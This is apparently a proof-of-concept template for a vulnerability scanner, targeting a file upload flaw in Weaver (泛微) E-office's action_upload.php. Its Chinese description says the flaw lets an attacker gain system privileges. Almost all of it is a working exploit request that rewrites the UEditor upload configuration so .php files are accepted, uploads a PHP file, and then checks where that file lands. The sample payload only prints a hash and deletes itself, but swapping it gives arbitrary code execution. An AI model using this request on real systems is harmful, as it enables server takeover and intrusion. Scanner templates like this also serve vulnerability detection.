<DudePoc_Name>泛微 E-office action_upload.php 存在文件上传漏洞</DudePoc_Name>
<DudePoc_Description>上海泛微网络科技股份有限公司E-office action_upload.php 存在文件上传漏洞，攻击者可利用该漏洞获取系统权限。</DudePoc_Description>
<DudePoc_SetHeader>
POST /newplugins/js/ueditor/php/action_upload.php?action=uploadimage&CONFIG[imagePathFormat]=/newplugins/js/ueditor/php/test/dude&CONFIG[imageMaxSize]=10000&CONFIG[imageAllowFiles][]=.php&CONFIG[imageFieldName]=yourfile HTTP/1.1
Host: $<AttackHost>$
Content-Length: 0
Content-Type: multipart/form-data; boundary=47a2054386f8c27b5f1ad264348b2977
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>
--47a2054386f8c27b5f1ad264348b2977
Content-Disposition: form-data; name="yourfile"; filename="yourfile.php"

$<AttackCode>$
--47a2054386f8c27b5f1ad264348b2977--

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData></DudePoc_VerifyData>
<DudePoc_VerifyFile>/newplugins/js/ueditor/php/test/yourfile.php</DudePoc_VerifyFile>
<DudePoc_AttackCode><?php echo md5(\'123456\');@unlink(__file__);?></DudePoc_AttackCode>
